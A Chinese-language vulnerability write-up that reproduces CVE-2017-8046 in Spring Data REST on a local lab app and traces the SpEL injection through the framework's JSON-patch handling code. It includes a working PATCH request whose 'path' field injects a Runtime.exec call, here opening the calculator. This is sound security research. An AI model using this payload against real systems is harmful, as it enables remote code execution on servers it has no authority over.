CVE-2017-8046 复现与分析

环境搭建

使用的项目为https://github.com/spring-guides/gs-accessing-data-rest.git里面的complete，直接用IDEA导入，并修改pom.xml中版本信息为漏洞版本。这里改为1.5.6。

之前尝试搭建了另一个验证环境，但是修改版本后加载一直报错，不知道是什么原因，写完在研究下。

直接运行，默认端口8080，访问http://localhost:8080/

people类有两个属性，firstName和lastName

package hello;

import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;

@Entity
public class Person {

    @Id
    @GeneratedValue(strategy = GenerationType.AUTO)
    private long id;

    private String firstName;
    private String lastName;

    public String getFirstName() {
        return firstName;
    }

    public void setFirstName(String firstName) {
        this.firstName = firstName;
    }

    public String getLastName() {
        return lastName;
    }

    public void setLastName(String lastName) {
        this.lastName = lastName;
    }
}

根据rest api规定，用POST请求新建一个people，请求如下

POST /people HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 32

{"firstName":"w","lastName":"q"}

此时已创建一个people对象，通过GET请求可以访问对象

漏洞复现

需要用PATCH方法，而且请求格式为JSON。根据RFC 6902，发送JSON文档结构需要注意以下两点：

1、请求头为Content-Type: application/json-patch+json

2、需要参数op、路径path，其中op所支持的方法很多，如test，add，replace等，path参数则必须使用斜杠分割

这样我们就可以构造payload了

PATCH /people/1 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type:application/json-patch+json
Upgrade-Insecure-Requests: 1
Content-Length: 256

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{111,112,101,110,32,47,65,112,112,108,105,99,97,116,105,111,110,115,47,67,97,108,99,117,108,97,116,111,114,46,97,112,112}))/lastName", "value": "vulhub" }]

参数path存在代码注入，可执行系统命令，这里运行的命令是open /Applications/Calculator.app，成功弹出计算器

漏洞分析

入口文件是位于org.springframework.data.rest.webmvc.config.JsonPatchHandler:apply()中

通过request.isJsonPatchRequest确定是PATCH请求之后，调用applyPatch(request.getBody(), target);。其中isJsonPatchRequest的判断方法是

public boolean isJsonPatchRequest() {
    // public static final MediaType JSON_PATCH_JSON = MediaType.valueOf("application/json-patch+json");
    return isPatchRequest() && RestMediaTypes.JSON_PATCH_JSON.isCompatibleWith(contentType);
}

所以这就要求我们使用PATCH方法时，contentType要为application/json-patch+json。

继续跟踪进入到applyPatch()方法中：

<T> T applyPatch(InputStream source, T target) throws Exception {
    return getPatchOperations(source).apply(target, (Class<T>) target.getClass());
}

继续跟踪进入到getPatchOperations()中：

private Patch getPatchOperations(InputStream source) {
    try {
        return new JsonPatchPatchConverter(mapper).convert(mapper.readTree(source));
    } catch (Exception o_O) {
        throw new HttpMessageNotReadableException(
                String.format("Could not read PATCH operations! Expected %s!", RestMediaTypes.JSON_PATCH_JSON), o_O);
    }
}

利用mapper初始化JsonPatchPatchConverter()对象之后调用convert()方法。跟踪org.springframework.data.rest.webmvc.json.patch.JsonPatchPatchConverter:convert()方法

public Patch convert(JsonNode jsonNode) {
        if (!(jsonNode instanceof ArrayNode)) {
            throw new IllegalArgumentException("JsonNode must be an instance of ArrayNode");
        } else {
            ArrayNode opNodes = (ArrayNode)jsonNode;
            List<PatchOperation> ops = new ArrayList(opNodes.size());
            Iterator elements = opNodes.elements();

            while(elements.hasNext()) {
                JsonNode opNode = (JsonNode)elements.next();
                String opType = opNode.get("op").textValue();
                String path = opNode.get("path").textValue();
                JsonNode valueNode = opNode.get("value");
                Object value = this.valueFromJsonNode(path, valueNode);
                String from = opNode.has("from") ? opNode.get("from").textValue() : null;
                if (opType.equals("test")) {
                    ops.add(new TestOperation(path, value));
                } else if (opType.equals("replace")) {
                    ops.add(new ReplaceOperation(path, value));
                } else if (opType.equals("remove")) {
                    ops.add(new RemoveOperation(path));
                } else if (opType.equals("add")) {
                    ops.add(new AddOperation(path, value));
                } else if (opType.equals("copy")) {
                    ops.add(new CopyOperation(path, from));
                } else {
                    if (!opType.equals("move")) {
                        throw new PatchException("Unrecognized operation type: " + opType);
                    }

                    ops.add(new MoveOperation(path, from));
                }
            }

            return new Patch(ops);
        }
    }

convert()方法返回Patch()对象，其中的ops包含了我们的payload。进入到org.springframework.data.rest.webmvc.json.patch.Patch中,

public Patch(List<PatchOperation> operations) {
    this.operations = operations;
}

通过上一步地分析，ops是一个List<PatchOperation>对象，每一个PatchOperation对象中包含了op、path、value三个内容。进入到PatchOperation分析其赋值情况

public PatchOperation(String op, String path, Object value) {

    this.op = op;
    this.path = path;
    this.value = value;
    this.spelExpression = pathToExpression(path);
}

进入到pathToExpression()中

public static Expression pathToExpression(String path) {
    return SPEL_EXPRESSION_PARSER.parseExpression(pathToSpEL(path));
}

可以看到这是一个SPEL表达式解析操作，但是在解析之前调用了pathToSpEL()。进入到pathToSpEL()中。

private static String pathToSpEL(String path) {
    return pathNodesToSpEL(path.split("\/"));          // 使用/分割路径
}

private static String pathNodesToSpEL(String[] pathNodes) {
    StringBuilder spelBuilder = new StringBuilder();
    for (int i = 0; i < pathNodes.length; i++) {
        String pathNode = pathNodes[i];
        if (pathNode.length() == 0) {
            continue;
        }
        if (APPEND_CHARACTERS.contains(pathNode)) {
            if (spelBuilder.length() > 0) {
                spelBuilder.append(".");            // 使用.重新组合路径
            }
            spelBuilder.append("$[true]");
            continue;
        }
        try {
            int index = Integer.parseInt(pathNode);
            spelBuilder.append('[').append(index).append(']');
        } catch (NumberFormatException e) {
            if (spelBuilder.length() > 0) {
                spelBuilder.append('.');
            }
            spelBuilder.append(pathNode);
        }
    }
    String spel = spelBuilder.toString();
    if (spel.length() == 0) {
        spel = "#this";
    }
    return spel;
}

重新回到org.springframework.data.rest.webmvc.config.JsonPatchHandler:applyPatch()中，

T applyPatch(InputStream source, T target) throws Exception {
    return getPatchOperations(source).apply(target, (Class<T>) target.getClass());
}

实际上PatchOperation是一个抽象类，实际上应该调用其实现类的perform()方法。通过动态调试分析，此时的operation实际是ReplaceOperation类的实例(这也和我们传入的replace操作是对应的)。进入到ReplaceOperation:perform()中，

<T> void perform(Object target, Class<T> type) {
    setValueOnTarget(target, evaluateValueFromTarget(target, type));
}

protected void setValueOnTarget(Object target, Object value) {
    spelExpression.setValue(target, value);
}

在setValueOnTarget()中会调用spelExpression对spel表示式进行解析，从而触发漏洞。

漏洞验证

明天用pocsuite写下poc，现在困了。